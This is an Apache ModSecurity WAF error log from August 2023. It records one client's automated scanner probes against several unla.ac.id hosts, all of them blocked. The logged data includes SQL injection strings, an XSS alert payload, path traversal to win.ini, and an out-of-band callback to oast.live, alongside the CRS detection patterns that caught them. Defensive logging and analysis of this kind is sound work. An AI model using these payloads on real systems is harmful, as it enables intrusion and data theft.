[Tue Aug 29 11:43:40.391832 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAfGaZkAAAAT"]
[Tue Aug 29 11:43:40.400379 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAfBL0cAAAAI"]
[Tue Aug 29 11:43:40.405172 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAdb7rMAAAAb"]
[Tue Aug 29 11:43:40.425251 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAdeQ6MAAAAQ"]
[Tue Aug 29 11:43:40.428918 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAeChd4AAAAw"]
[Tue Aug 29 11:43:40.451521 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfEBuwAAAAO"]
[Tue Aug 29 11:43:40.470377 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAeChd8AAAAw"]
[Tue Aug 29 11:43:40.491232 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAdb7rYAAAAb"]
[Tue Aug 29 11:43:40.496523 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAARpg@MAAAAU"]
[Tue Aug 29 11:43:40.500999 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfEBu4AAAAO"]
[Tue Aug 29 11:43:41.360974 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13fcCo-f0AAAdftbEAAAAG"]
[Tue Aug 29 11:43:41.383507 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fcCo-f0AAAfGaZ4AAAAT"]
[Tue Aug 29 11:43:42.412922 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAe8l2YAAAAF"]
[Tue Aug 29 11:43:42.532786 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAdb7rwAAAAb"]
[Tue Aug 29 11:43:42.560104 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAARpg@YAAAAU"]
[Tue Aug 29 11:43:42.563492 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAe1eiQAAAAB"]
[Tue Aug 29 11:43:42.571973 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAdb7r0AAAAb"]
[Tue Aug 29 11:43:43.364660 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/file"] [unique_id "ZO13f8Co-f0AAAfGaaMAAAAT"]
[Tue Aug 29 11:43:43.373648 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/file"] [unique_id "ZO13f8Co-f0AAAe1eiYAAAAB"]
[Tue Aug 29 11:43:43.395717 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13f8Co-f0AAAdb7r4AAAAb"]
[Tue Aug 29 11:43:44.375619 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAdb7sAAAAAb"]
[Tue Aug 29 11:43:44.380300 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAc@cd8AAAAL"]
[Tue Aug 29 11:43:44.385267 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAe39@cAAAAA"]
[Tue Aug 29 11:43:44.397119 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAfGaaYAAAAT"]
[Tue Aug 29 11:43:44.413496 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gMCo-f0AAAe39@gAAAAA"]
[Tue Aug 29 11:43:45.373181 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAc4ErMAAAAP"]
[Tue Aug 29 11:43:45.377339 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAe8l3MAAAAF"]
[Tue Aug 29 11:43:45.384718 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAc@ceIAAAAL"]
[Tue Aug 29 11:43:45.388740 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAdxUYkAAAAC"]
[Tue Aug 29 11:43:45.485115 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAdb7sgAAAAb"]
[Tue Aug 29 11:43:47.400793 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAe8l34AAAAF"]
